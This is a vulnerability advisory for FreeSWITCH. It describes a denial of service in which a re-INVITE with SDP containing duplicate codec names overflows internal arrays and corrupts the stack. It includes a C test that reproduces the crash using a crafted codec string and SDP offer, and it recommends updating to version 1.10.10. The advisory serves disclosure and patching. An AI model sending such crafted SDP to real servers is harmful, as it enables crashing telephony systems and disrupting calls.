FreeSWITCH allows authorized users to cause a denial of service attack by sending re-INVITE with SDP containing duplicate codec names
By abusing this vulnerability, an attacker is able to corrupt stack of FreeSWITCH leading to an undefined behavior of the system or simply crash it.
The following FreeSWITCH test will reproduce the attack. This test requires mod_av and mod_opus modules to be loaded.
FST_SESSION_BEGIN(matches_and_greedy_sort)
{
switch_status_t status;
switch_media_handle_t *media_handle;
switch_core_media_params_t *mparams;
char *r_sdp, *codec_string;
uint8_t match = 0, p = 0;
switch_channel_set_variable(fst_channel, "rtp_codec_negotiation", "greedy");
codec_string = "CORE_VPX_MODULE.VP8,mod_opus.opus@48000h@20i,CORE_PCM_MODULE.PCMU@8000h@20i@64000b,CORE_PCM_MODULE.PCMA@8000h@20i@64000b,mod_av.H264~level-asymmetry-allowed=1;packetization-mode=1;profile-level-id=42001f,mod_av.H264~level-asymmetry-allowed=1;packetization-mode=0;profile-level-id=42001f,mod_av.H264~level-asymmetry-allowed=1;packetization-mode=1;profile-level-id=42e01f,mod_av.H264~level-asymmetry-allowed=1;packetization-mode=0;profile-level-id=42e01f,mod_av.H264~level-asymmetry-allowed=1;packetization-mode=1;profile-level-id=4d001f,CORE_VPX_MODULE.VP9~profile-id=0,CORE_VPX_MODULE.VP9~profile-id=2,mod_av.H264~level-asymmetry-allowed=1;packetization-mode=1;profile-level-id=64001f";
switch_channel_set_variable(fst_channel, "codec_string", codec_string);
mparams = switch_core_session_alloc(fst_session, sizeof(switch_core_media_params_t));
mparams->rtpip = switch_core_session_strdup(fst_session, "127.0.0.1");
status = switch_media_handle_create(&media_handle, fst_session, mparams);
fst_check(status == SWITCH_STATUS_SUCCESS);
r_sdp = "v=0\n"
"o=Z 0 645783902 IN IP4 127.0.0.1\n"
"s=Z\n"
"c=IN IP4 127.0.0.1\n"
"t=0 0\n"
"m=video 65201 RTP/AVP 103 116 118 119 120 121 122\n"
"a=rtpmap:103 H264/90000\n"
"a=rtpmap:116 VP8/90000\n"
"a=rtpmap:118 H264/90000\n"
"a=fmtp:118 profile-level-id=42E020; packetization-mode=0; sprop-parameter-sets=Z0LAFoyNQFAekA8IhGo=,aM48gA==\n"
"a=rtpmap:119 H264/90000\n"
"a=fmtp:119 profile-level-id=42E020; packetization-mode=1; sprop-parameter-sets=Z0LAFoyNQFAekA8IhGo=,aM48gA==\n"
"a=rtpmap:120 H264/90000\n"
"a=fmtp:120 profile-level-id=42E021; packetization-mode=0; sprop-parameter-sets=Z0LAFoyNQFAekA8IhGo=,aM48gA==\n"
"a=rtpmap:121 H264/90000\n"
"a=fmtp:121 profile-level-id=42E022; packetization-mode=0; sprop-parameter-sets=Z0LAFoyNQFAekA8IhGo=,aM48gA==\n";
match = switch_core_media_negotiate_sdp(fst_session, r_sdp, &p, SDP_TYPE_REQUEST);
}
FST_SESSION_END()
Summary
FreeSWITCH allows authorized users to cause a denial of service attack by sending re-INVITE with SDP containing duplicate codec names
Description
When a call in FreeSWITCH completes codec negotiation, the
codec_stringchannel variable is set with the result of the negotiation. On a subsequent re-negotiation, if an SDP is offered that contains codecs with the same names but with different formats, there may be too many codec matches detected by FreeSWITCH leading to overflows of its internal arrays.Impact
By abusing this vulnerability, an attacker is able to corrupt stack of FreeSWITCH leading to an undefined behavior of the system or simply crash it.
How to reproduce the issue
The following FreeSWITCH test will reproduce the attack. This test requires mod_av and mod_opus modules to be loaded.
Solution and recommendations
Update to FreeSWITCH version >= 1.10.10
Credit: SignalWire Inc.